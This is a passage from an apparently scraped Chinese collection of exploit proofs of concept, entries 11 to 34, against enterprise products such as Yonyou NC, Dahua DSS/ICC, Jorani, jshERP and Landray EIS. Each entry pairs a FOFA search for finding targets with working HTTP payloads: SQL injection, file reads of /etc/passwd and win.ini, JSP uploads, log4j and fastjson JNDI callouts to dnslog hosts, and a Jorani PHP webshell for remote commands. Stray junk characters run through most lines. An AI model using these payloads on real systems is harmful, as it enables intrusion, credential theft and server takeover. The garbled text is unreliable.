11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入/ f5 x) R0 t8 m
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
; ~. Y1 |& Q+ C$ i# I( RGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.18 k! P- G( [' e( d) J
Host: 127.0.0.10 L8 D2 e7 ~ @; c% J0 a
Pragma: no-cache5 F: u, o8 L' S5 T& ?
Cache-Control: no-cache
% @+ k7 T. k; O9 B. IUpgrade-Insecure-Requests: 1! l% M C3 y$ z/ w$ ^ I* G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 ?( R& n/ r9 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 d0 ? p5 @ a( i
Accept-Encoding: gzip, deflate
/ T! C2 K' t' [Accept-Language: zh-CN,zh;q=0.9,en;q=0.8" q: o3 y' f2 o3 ?( _
Connection: close
% Q/ p) x7 O7 k0 {/ m6 W$ W7 u& _2 d+ {3 C. f9 O( V( f
; [5 y& A3 b9 f6 d, H" j7 ~: c0 ]12. Jorani < 1.0.2 远程命令执行
3 w, K: b L& T5 Z( sFOFA:title="Jorani"# |8 Q1 S# d6 L. h( {: X
第一步先拿到cookie
6 C" y& h# t7 I& u2 hGET /session/login HTTP/1.1" ~6 ^# m, z' U
Host: 192.168.190.30
% [. g! ~( {, _( tUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
* v- X$ I' U0 BConnection: close
, O' y; x; H: w) kAccept-Encoding: gzip( ~$ t2 f$ w( y
; l6 P& l! ?2 v( J
# k0 @" R" X. p6 {" }* Z E$ C响应中csrf_cookie_jorani用于后续请求
$ j" Y% ?0 `% j" o- ?8 oHTTP/1.1 200 OK
& n( g6 S, v* `0 R5 x0 s: C# IConnection: close. h$ J( ~$ ]: J+ a
Cache-Control: no-store, no-cache, must-revalidate( K7 K |' b* q
Content-Type: text/html; charset=UTF-8# z2 K; s# }' x
Date: Tue, 24 Oct 2023 09:34:28 GMT
k8 t4 R8 s) X# e) Z5 j& bExpires: Thu, 19 Nov 1981 08:52:00 GMT- v9 K% q7 V, |6 w- J' t3 r( O- G
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
3 K8 [$ Z+ C1 xPragma: no-cache& a1 ?0 J8 b3 s$ j& }
Server: Apache/2.4.54 (Debian)
8 w( }7 j6 H0 c# V5 l% pSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/ l3 k$ [: H. q6 d% \
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly+ j/ c2 Y4 K$ A5 `+ t
Vary: Accept-Encoding
' l- W j0 R4 a* e' Y4 o; C2 C4 g0 Q2 [% {3 \9 j; f+ u8 ~
7 `: M {- P( P4 n5 @POST请求,执行函数并进行base64编码9 @7 W# Z- r" P8 e" Q Y" v) K
POST /session/login HTTP/1.1
' q6 X- c, G; f# M6 v3 s" QHost: 192.168.190.30' F7 F$ R: A! E6 P2 V0 ]4 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36* I7 e( Y3 o( i; j, P
Connection: close
7 n+ } e6 B7 M% U7 TContent-Length: 252
) [+ D% S: A, s! b. w/ [% ^& fContent-Type: application/x-www-form-urlencoded
. R; G, r# R. [7 L1 pCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
7 {0 ` N) O U, SAccept-Encoding: gzip
% M* n7 u; [6 \+ c2 l
4 L2 B% m$ Z0 z) w0 s: `csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
U# z X% i) d+ j" A3 Z" x2 E( r
; D3 c; w' L" I( O! ]
6 b( y( u, g8 W9 [' q: S: h
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串! l: N6 c( X9 L3 _6 d# t( B
GET /pages/view/log-2023-10-24 HTTP/1.1
' U+ M2 s0 t' W' N; qHost: 192.168.190.309 t9 P( V( C& L, D7 Q3 N/ S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; e) e/ t ] O8 R
Connection: close2 u" L6 y+ Q8 h4 L. x
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r* C. E: g i& @/ O! |1 [* n
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
! ?* K3 P% @4 U% o: W6 V r# DX-REQUESTED-WITH: XMLHttpRequest8 {! z) t0 w8 H- \) |$ y7 ]
Accept-Encoding: gzip
' j6 Y5 h0 s( | x2 R3 V& y
r: c, I1 d. d, n3 }% j
' a2 k' F8 Y6 U" g& O4 l13. 红帆iOffice ioFileDown任意文件读取
' c7 K# ?1 u2 t* {& pFOFA:app="红帆-ioffice"; k/ o8 ?" Q! G1 V0 Q) o4 ^
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1) p; v( \ Y B& X1 l& y
Host: x.x.x.x
$ v) a) Z) y2 v. a7 b' i5 WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ ~8 s) B! a2 H9 R
Connection: close
/ h T' _3 ^& |; y, }8 R2 G# GAccept: */** {4 |$ l& L; _& N- H3 D
Accept-Encoding: gzip/ P2 H! |$ z n% q$ s( J6 Y0 y* V
! b6 ?6 k5 F5 b7 d; E+ _! s F8 G# s" Y1 y% J3 D
14. 华夏ERP(jshERP)敏感信息泄露8 J) o. i3 u N
FOFA:body="jshERP-boot"
% V2 n, w, I$ |/ O7 Y1 |; W泄露内容包括用户名密码
+ N: R8 e4 ~! s& F0 e" D4 F8 KGET /jshERP-boot/user/getAllList;.ico HTTP/1.18 |1 k5 C6 A# ^7 t. V3 w2 g
Host: x.x.x.x
+ ?, y: I! t* v- b: f$ }0 a8 V. EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
. Q$ |0 O) X J: e& \Connection: close
& }+ ]0 l4 Q, ` c& v8 o- w9 O! k8 mAccept: */*& h' P& ~8 T( u5 ^
Accept-Language: en
5 h8 N- \) y# u8 |6 q& HAccept-Encoding: gzip% D9 t( a; @2 \
/ ?$ L" M5 u- a( X
) x* F6 c V# C9 n7 M7 n: P9 Z
15. 华夏ERP getAllList信息泄露5 L7 I) u# X, y4 C. C
CVE-2024-0490, B; }$ N3 f" n( ^
FOFA:body="jshERP-boot"3 j$ c! q, U0 P* t# e
泄露内容包括用户名密码
& @3 D$ |0 M# J6 ZGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.10 d. \0 n4 \6 v5 ~
Host: 192.168.40.130:100& [& y7 e$ \7 O9 M6 v _1 b; r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# w2 X( L4 m9 M" w( b; j3 U* ~Connection: close* f% s0 t, T2 G8 _* z1 ?* R
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.89 Z% ]9 T% c3 U1 B8 V7 P
Accept-Language: en! ^/ Z+ a7 K* g6 J/ ~8 T
sec-ch-ua-platform: Windows
, k4 c) v& g# c( v& LAccept-Encoding: gzip
1 d( H/ `* c' S
: K- w- W) D4 I' m
- V5 K* v" H6 G& M2 [: S: G16. 红帆HFOffice医微云SQL注入; p# ]) B- ?! f2 Z. }2 }
FOFA:title="HFOffice"1 _2 U: m( x" s: ^: A9 G1 L( o" O
poc中调用函数计算1234的md5值" D6 W, W7 `& Q. q8 k
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
, S9 ]- A9 c7 _! n# L* E3 ^* H3 n$ oHost: x.x.x.x
# S5 h7 Y' c/ L% d: Z7 |0 E% F7 CUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36" ^; N5 h. i& B4 P/ A0 t7 {" d
Connection: close* t' S) i8 F( @
Accept: */*
( e2 Y; a. g& j; f) Z" q1 ^8 lAccept-Language: en: y& U" ^" ^: |7 H) P
Accept-Encoding: gzip
# L( x) b! Y, e( Z5 J
9 i b( u/ W; Z- [* a# k; D( e3 Z3 f9 d9 B/ _ {0 N
17. 大华 DSS itcBulletin SQL 注入) B, h; w! |+ t- D$ P
FOFA:app="dahua-DSS"$ D: h- B$ K1 e& Y0 m4 ^
POST /portal/services/itcBulletin?wsdl HTTP/1.1
5 |* m4 k0 n; |7 q1 t- k( A# R& B# KHost: x.x.x.x* W$ ]7 I, V+ d) |, T8 w$ j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 u; Q' [/ r, h+ _# oConnection: close
8 X) k1 W3 t/ @' e" cContent-Length: 345
1 ~2 F2 m( n+ v6 @/ ZAccept-Encoding: gzip
8 R; w" e0 x4 n; J
* x" y f0 C) C7 b- `<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>' C/ s- I, F3 }
<s11:Body>
) K, P0 I$ L+ b2 d3 s1 c( i8 S <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
1 E2 _+ _5 H- ]" \/ I <netMarkings> Y2 f9 J" u" b! S" F
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( l1 T* c9 B0 e </netMarkings>( V! q* z/ t* T7 T! B2 o9 J: [+ H
</ns1:deleteBulletin>
& u3 K2 J! x9 C( p </s11:Body>( g. G! Y$ w' m
</s11:Envelope>; r% g, [9 w q' u: a: u
* f1 `, d! J: K4 \1 j/ h1 `0 \: l. t3 Z4 ^' }5 `
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露+ X# A0 a A8 \
FOFA:app="dahua-DSS"
! z& ~2 `9 L7 x3 {1 wGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
& i" ?9 i1 A, y0 m! ~. LHost: your-ip G! E2 k! O- m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* g a2 O0 U) I3 B# W; I0 R' v
Accept-Encoding: gzip, deflate+ u0 y0 L* v. f$ w x
Accept: */*4 O& R* ^+ R. r% o9 L
Connection: keep-alive
: N9 V- t& l; l% a& E. c% ]5 \' [+ p, K$ d+ Q1 {* ?! e: ]0 C
- U& @# o/ }4 P0 u5 Y7 ~
/ ^( B1 F: H- A, X. t5 K) |19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入4 K, ?8 G) K, e' i4 W3 T
FOFA:app="dahua-DSS"
- d" H7 [# P# R. l: G5 W/ `GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
) D, V6 \" A" {) bHost:$ ~! P7 g; e% J2 I9 ? ]; e1 j
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" ]6 X5 j7 x0 Z$ K6 `& G$ q( P
Accept-Encoding: gzip, deflate u6 s) h" F9 Q4 m& K% m6 d
Accept: */*
8 r0 L* m. Y. Y' ?* `7 k3 @Connection: keep-alive
* K o4 M* I" V N. g( Q1 l7 O4 P" ?* z# g! ` X7 K4 u" c3 N5 W) r
. S$ H' O C, o
20. 大华ICC智能物联综合管理平台任意文件读取2 g7 `4 _6 G0 @
FOFA:body="*客户端会小于800*"
' }& v4 G% M0 d) xGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
7 {# |$ Z; e0 I3 O6 N: bHost: x.x.x.x/ l2 Z; o; v+ v, H) {# J0 z* N2 p
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 ~" Z5 \! H- |" m) l2 T. [
Connection: close1 y$ V* b7 w% w
Accept: */*9 I3 M4 X6 Y3 x$ l# z
Accept-Language: en, q' I6 x, G$ g2 x9 C
Accept-Encoding: gzip
( i8 E& K3 g. {4 V, W
; P9 a2 k3 b$ C% {) o; V! ^$ ]3 s% Z- a
21. 大华ICC智能物联综合管理平台random远程代码执行0 e5 Q# u* d. W" {0 h' Z f& [, e3 Z% n
FOFA:icon_hash="-1935899595"
: Z( e! j* \9 s5 ?. J- h/ I. U" q( gPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
6 L$ }2 s' J; c4 |2 L' P' KHost: x.x.x.x, i2 K. k) a6 a" C/ e' I' T* l$ p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* ^, j1 o: O0 \
Content-Length: 161
( f# e* j4 c' qAccept-Encoding: gzip8 H. }1 j; _4 c/ S- a" D
Connection: close
9 T2 Z2 A+ ]( N) {4 kContent-Type: application/json;charset=utf-85 Q, S: P; g4 u' s
8 s* Z" D# d) N* @& U3 d. O+ `{
) Y' _( P/ j V0 K7 ~ b7 N"a":{! [% Y2 U: H( Q; J. v
"@type":"com.alibaba.fastjson.JSONObject",/ C; i- E3 @- l1 J2 C9 p
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
, B% B! L% N& ~* w }"". F! h% }$ `8 Y* L
}
& v- |3 | b1 d9 b9 A
% x' d6 S, p$ v: T% h* i% T
) q) q6 X% R9 B7 l' P4 n b) Y7 m22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& Z0 S) {6 V; e# w0 D1 v: A5 A& QFOFA:icon_hash="-1935899595"
6 @$ }6 C0 a; m: v t& \POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
1 W7 }0 s( U I; C- [( R0 I XHost: your-ip
, T, R& `: W$ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* ?2 f: i; U5 p# \. MContent-Type: application/json;charset=utf-8
# V3 I# @; {3 Q) U) N: l% g3 \ p0 v* t* A: A$ B
{
. e" X2 S; R* O7 y1 B2 _ u# @"loginName":"${jndi:ldap://dnslog}"
4 @; i/ v" ~9 u}& l- Z% }9 a! R- R0 i3 [+ k
, x/ i. J+ x4 L! ^% [, p2 P8 R; Q- {+ @* {( P$ O* X6 @# \
2 ^0 v0 u, d$ ~& Q9 v6 p4 Y6 Z23. 大华ICC智能物联综合管理平台 fastjson远程代码执行9 p( W4 y( K1 H+ B# M
FOFA:icon_hash="-1935899595"+ {1 \; P$ ?4 r
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.12 i9 j+ \8 g5 I* i/ c9 b9 V/ P
Host: your-ip1 ?5 [9 t5 c; ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 v9 e, k4 f" n1 [, h
Content-Type: application/json;charset=utf-8
2 U, G2 h* B; u5 X7 ]# q4 `' C& CAccept-Encoding: gzip9 f4 r0 y( b% v& r1 f2 N. Z
Connection: close$ P1 N+ ~5 O+ ^0 ^0 G- }, o) h
' J* [" p& {( R3 `! m8 L7 U{4 c+ O0 |3 `$ ?0 [( \1 T2 q
"a":{
) B6 X- u( G$ C1 } "@type":"com.alibaba.fastjson.JSONObject",
1 U0 s x% M/ b {"@type":"java.net.URL","val":"http://DNSLOG"}, a* B; W. x K R
}""
8 q( o) X. r' @}: d5 b7 b# z5 D) p# a! G
7 M, w* m% }- V6 {/ C
' [2 U; E1 _3 ]+ _24. 用友NC 6.5 accept.jsp任意文件上传
3 c6 C% `6 Q( GFOFA:icon_hash="1085941792"
# b c/ X+ Q2 j5 G7 L/ s: f; _POST /aim/equipmap/accept.jsp HTTP/1.1+ f* s9 b+ {5 t7 _$ c
Host: x.x.x.x
( k8 ~. G2 ~8 D" P. a7 LUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
! F8 l$ A* Y% B9 V/ u9 EConnection: close
2 W* B9 N c3 @! j9 m7 y, kContent-Length: 449! h$ ^* d0 y/ f) W1 ~$ R' `4 K2 \# F5 q; i
Accept: */*
3 \: x6 x- U i) [, DAccept-Encoding: gzip3 V! s+ _+ y, R3 l1 S
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' B' o' d- D6 v5 T
+ E, _+ H, @7 L5 I
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
- x8 f d8 Q d$ \9 TContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
g: x3 K7 K( f, G- R6 c/ s4 YContent-Type: text/plain% y8 I1 Z' B! f$ r3 \9 v
* e" n! P. i% C/ u# @6 e
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
( \" V* t; M3 O7 Z-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: o- h4 q; a4 Z% X. i6 L/ H
Content-Disposition: form-data; name="fname"
7 z: Q/ K% r9 {; q: a
% L5 A: ?+ c/ P# j\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
2 I5 K( p, B0 r" q-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--) @4 i# z& c$ i6 p( m
5 f, a. o$ j' _# y& m, T( M8 ]. {$ J/ }7 q) C4 h
25. 用友NC registerServlet JNDI 远程代码执行) F" n2 l: l7 F
FOFA:app="用友-UFIDA-NC"% R+ C9 g" b0 x- O
POST /portal/registerServlet HTTP/1.1
! m. l5 k0 ?0 N, ?+ M6 z3 t- H) @Host: your-ip4 Y2 {+ ?, j7 _* n, ~, E2 L: [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.08 o$ |" o1 N3 y; u; D: f: _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.99 ]) f |' I- d; x- b( U
Accept-Encoding: gzip, deflate
2 y: t: P6 `" u3 W! @* ?( aAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
8 }- q% W. b/ c6 y( \Content-Type: application/x-www-form-urlencoded2 R2 G$ B6 b4 c$ ]; l8 x1 q
' `, D) m# w, K" p7 H6 s$ wtype=1&dsname=ldap://dnslog9 f2 I V$ Q: \7 a; l
, H# `8 U& E$ ^) d# p0 P* W
# Y) H( s: _/ A
' q! C% e* O p( ?: ~26. 用友NC linkVoucher SQL注入
0 m7 k; Q2 V3 k" L. F7 o5 d- ?9 ~4 P' aFOFA:app="用友-UFIDA-NC"& S, p7 j- {" C1 \
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.17 E0 g( X0 T7 G9 ]! S0 H- _
Host: your-ip2 u3 c$ E7 `/ X( E. e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) T6 b- _# X* T* ~3 z6 j) W( uContent-Type: application/x-www-form-urlencoded
, }7 ^: Z! v; {( k, RAccept-Encoding: gzip, deflate
" w0 Y& W0 k t0 JAccept: */*5 h5 b* C; n$ N9 U! Y& C2 ~. i* [1 x
Connection: keep-alive1 [/ O1 ]0 t2 C+ L/ d
' ` n6 O% ^! F; o0 X8 {0 L* j
* \- O, x1 f" Q i5 f27. 用友 NC showcontent SQL注入
+ g( j6 n5 ^! g: jFOFA:icon_hash="1085941792"
6 k! |1 v- O8 [4 ~! c6 ^GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.13 H7 h: Z/ M3 j! i* k0 O1 J2 W
Host: your-ip
3 e2 U7 {& P+ o& }" ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( W# c2 {( d+ }. R0 g7 d/ O8 c* SAccept-Encoding: identity
9 H' J2 p* s4 g B% xConnection: close4 o5 Q6 ?' ]! |$ H" ~5 o8 E1 q5 W
Content-Type: text/xml; charset=utf-8
7 U7 x3 s" ~2 y# W2 d9 g+ R( ?
& q( D. N9 e, n* t4 U9 K& a7 X# c8 C5 P& n
28. 用友NC grouptemplet 任意文件上传
: e: a) j, t. C$ \2 pFOFA:icon_hash="1085941792"
% j: o# M% |7 t; R- w5 ^POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1' A0 D4 ~. ]3 o+ J
Host: x.x.x.x7 t* z- @8 Q) ^/ H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
8 s7 w8 K0 ^0 y9 M% m8 R- g/ qConnection: close! W7 G) Z! R% K4 Z5 W. w, P+ n: L. f" {, [
Content-Length: 268
; j/ J) T5 r h9 T4 L5 PContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
/ C0 H9 M! X* p; ~Accept-Encoding: gzip
# s9 L. P* H2 p7 T& C* z3 A3 W
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
! N/ k( Y2 X% V: q7 w! M- tContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"( o* v* q% B5 e# D8 Y4 T
Content-Type: application/octet-stream
/ O1 a- C6 R% H: d8 N+ [4 K9 F! Y/ K$ H0 X: Z* b
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>3 t8 v b3 _5 d/ h2 i1 o3 W
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
+ X b2 @8 A5 C0 B$ ~
+ h2 W: y9 j7 A& y$ |3 C* U. C& f5 u0 \5 B u! |5 z, V3 g9 A
/uapim/static/pages/nc/head.jsp
) ~, Y( Z! f& I- X* n9 K2 E/ v
- w+ ]7 S; M5 O6 ]( w29. 用友NC down/bill SQL注入
9 G# K- s* y0 B; GFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"- ]+ X9 ?. p6 q
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
* W$ `$ ]4 D! H9 x/ o2 VHost: your-ip3 r3 y9 @, _( x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ J1 P/ p$ P: c* E6 z2 A/ X8 w
Content-Type: application/x-www-form-urlencoded
- h! v K" ?, f' K+ h) [* R; ?8 Y/ p7 oAccept-Encoding: gzip, deflate+ v, q4 R- D: u, s2 v1 k; L
Accept: */*
% _' t5 ?* c o+ BConnection: keep-alive7 t9 r/ b6 s+ }* H1 z
# \3 s3 b$ y/ k4 r! ^9 ?
# n! Y! `% u3 E+ Y+ @30. 用友NC importPml SQL注入7 F& v7 G+ b( v% a& o
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif") \3 {- j) n0 A* _6 Z( c' v
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
|- C" A. I7 O5 X. a4 }" c. `) NHost: your-ip8 s) j, [6 N' @6 o6 l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V6 v. l( x0 U7 O* f$ z o; ]0 f8 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' b+ \+ `; `+ NConnection: close
; p, p0 h6 ^9 j
* z" j1 m- b: @2 g------WebKitFormBoundaryH970hbttBhoCyj9V0 _; e& ~: q" w4 ^, D/ B9 ^, ~+ o
Content-Disposition: form-data; name="Filedata"; filename="1.jpg", D6 o& H( t* H( s4 j3 [( J
Content-Type: image/jpeg
b% z6 E3 F+ {------WebKitFormBoundaryH970hbttBhoCyj9V--6 p! d* j$ {8 R8 L9 a/ T& n
/ F, i( A' P7 r2 P3 Y- U1 P! N% C V" h2 n7 J" x+ q
31. 用友NC runStateServlet SQL注入* l' d$ q: Q" ~1 l" L+ N
version<=6.5# M$ e- j* k* [ N8 @$ K
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
9 i2 n" ^1 m9 I$ ^, eGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ [6 z, j) G |9 C3 \/ l
Host: host
! ? q1 e% i* `5 L5 a) W" B2 t! zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( h5 f) t9 u$ K8 U
Content-Type: application/x-www-form-urlencoded y; c) P" | [7 k9 M; J
* A+ Y" p. Y" @: H" {( p3 i
( R! q+ k' \0 z. |9 _* v32. 用友NC complainbilldetail SQL注入9 s" E! f+ _( \& ^; v4 t! z
version= NC633、NC65: q) M( ?& U0 b- Q0 e0 s2 c) t
FOFA:app="用友-UFIDA-NC"
: U! K& [' v" e" K$ V/ f+ `; PGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ B ~5 y/ }. H' c. J6 {5 F0 ^Host: your-ip8 U1 Q# |# A* {8 H- Z. `1 }4 P3 W1 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; d+ n- T3 I q& ~! yContent-Type: application/x-www-form-urlencoded* t3 P3 H6 L* ]/ ?4 B- H. E/ v) G
Accept-Encoding: gzip, deflate
$ c% B* z/ t, }% ~ Y3 a$ W6 F$ g4 EAccept: */*0 J \* g4 b J
Connection: keep-alive
5 W. W& J, @) [" ~5 ?+ g) P# @ c1 b$ d
. P S3 A- n% d+ O& i33. 用友NC downTax/download SQL注入8 I- n/ S3 n- R& Y4 \2 [2 {6 P
version:NC6.5FOFA:app="用友-UFIDA-NC"
: ~/ |: i2 I6 [9 z* d1 b) j! |' eGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 C" e/ s; L( @& _Host: your-ip
2 y0 D5 i* M3 M" I& ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 o6 u4 H# z) }8 \& u- A
Content-Type: application/x-www-form-urlencoded
) ?* W0 F$ W/ {9 lAccept-Encoding: gzip, deflate4 M) B; X6 V+ M9 E' W
Accept: */*
2 s' y1 `7 _7 R5 x/ O; ]* X# zConnection: keep-alive
8 ^8 c, I% D1 t1 i- p1 I- ^
6 r( V1 f) Y. y6 G5 g I& J" t7 O9 j
6 ^; a$ Z/ F, ?) B9 o34. 用友NC warningDetailInfo接口SQL注入
) u) \1 _6 }/ T# tFOFA:app="用友-UFIDA-NC"
+ @9 @9 X+ x8 x& h, {GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1; i# c+ `8 T* k" J6 i( g0 s6 l
Host: your-ip
4 ?% L% Q8 O) }) iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 \* `) }; j2 nContent-Type: application/x-www-form-urlencoded
9 v) D# P: S% k2 jAccept-Encoding: gzip, deflate! L. u+ o; |. _3 [, z* o! a
Accept: */*
